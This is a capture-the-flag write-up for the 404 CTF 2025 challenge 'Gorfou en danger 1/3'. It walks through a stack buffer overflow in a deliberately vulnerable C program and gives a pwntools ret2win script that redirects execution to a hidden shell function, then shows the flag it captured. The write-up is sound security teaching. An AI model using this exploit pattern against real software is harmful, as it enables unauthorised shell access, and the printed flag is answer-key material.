Gorfou en danger 1/3 | 404 CTF 2025
Gorfou en danger 1/3
Ressources
Une tempête de sable d’une intensité sans précédent a frappé notre station martienne “Fermat”, laissant notre agent Cody bloqué et la plupart de nos systèmes hors service. Notre seul espoir réside dans l’exploitation d’une ancienne console d’accès, obsolète mais encore fonctionnelle. Nous pourrions ainsi démarrer à distance la fusée de secours où Cody attend désespérément.
Host : challenges.404ctf.fr Port : 32462
gorfou-en-danger-1
├── chall
└── main.c
Analyse
First, I what the programm want me to do by executing it :
1
2
3
4
5
6
7
8
9
10
11
12
13
__
/\ \
/ \ \ .--------------------------------------------------------.
/ /\ \ \ |░█▀▄░█▀▀░█▀▀░█▀▀░░░█▀▀░█▀█░█▀█░█▀▀░█▀█░█░░░█▀▀░░░█░█░▀█░|
/ / /\ \ \ |░█░█░█░█░▀▀█░█░█░░░█░░░█░█░█░█░▀▀█░█░█░█░░░█▀▀░░░▀▄▀░░█░|
/ / /__\_\ \ |░▀▀░░▀▀▀░▀▀▀░▀▀▀░░░▀▀▀░▀▀▀░▀░▀░▀▀▀░▀▀▀░▀▀▀░▀▀▀░░░░▀░░▀▀▀|
/ / /________\ '--------------------------------------------------------'
\/___________/
Terminal de contrôle à distance de la base martienne Fermat
> help
Commande inconnue
> test
Commande inconnue
It seems that the program is a terminal that we can use to execute commands. The problem is that we don’t know what commands we can use. So let’s take a look at the main.c file to see if we can find something interesting.
main()
1
2
3
4
5
6
7
int main(void) {
while (1) {
take_command();
}
return 0;
}
The main file do a while loop that call take_command().
take_command()
1
2
3
4
5
6
7
void take_command() {
char command[0x100];
printf("> ");
read(0, command, 0x130);
printf("Commande inconnue\n");
}
This function create a buffer of 0x100 bytes (256 bytes) and read the input in it. The problem is that the buffer is 0x100 bytes but the read function read 0x130 bytes. So we have our buffer overflow here.
There is also another function that is not called that seems interesting.
debug_info()
1
2
3
4
5
6
7
8
9
10
11
12
void debug_access(void) {
puts("Accès à l'interface de debogage...");
__asm__(
".intel_syntax noprefix;"
"push 0x0;"
".att_syntax;"
);
system("/bin/sh");
return;
}
this function permit to get a shell, so we have a basic ret2win.
Goal
The goal is to get a shell by using the buffer overflow. We can do this by overwriting the return address of the take_command() function with the address of the debug_access() function.
Exploit
the only thing we need it to get the address of the debug_access() function. We can do this by using the gdb > info functions command.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
from pwn import *
host = 'challenges.404ctf.fr'
port = 32462
target = remote(host, port)
OFFSET = 264
WIN = 0x00000000004004fd
payload = b'A' * OFFSET + p64(WIN)
target.sendline(payload)
target.interactive()
Getting flag
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
python3 exploit.py
[+] Opening connection to challenges.404ctf.fr on port 32462: Done
[*] Switching to interactive mode
__
/\ \
/ \ \ .--------------------------------------------------------.
/ /\ \ \ |░█▀▄░█▀▀░█▀▀░█▀▀░░░█▀▀░█▀█░█▀█░█▀▀░█▀█░█░░░█▀▀░░░█░█░▀█░|
/ / /\ \ \ |░█░█░█░█░▀▀█░█░█░░░█░░░█░█░█░█░▀▀█░█░█░█░░░█▀▀░░░▀▄▀░░█░|
/ / /__\_\ \ |░▀▀░░▀▀▀░▀▀▀░▀▀▀░░░▀▀▀░▀▀▀░▀░▀░▀▀▀░▀▀▀░▀▀▀░▀▀▀░░░░▀░░▀▀▀|
/ / /________\ '--------------------------------------------------------'
\/___________/
Terminal de contrôle à distance de la base martienne Fermat
> Commande inconnue
Accès à l'interface de debogage...
$ cat flag.txt
404CTF{c@n_7He_GoRF0u_F1y_?}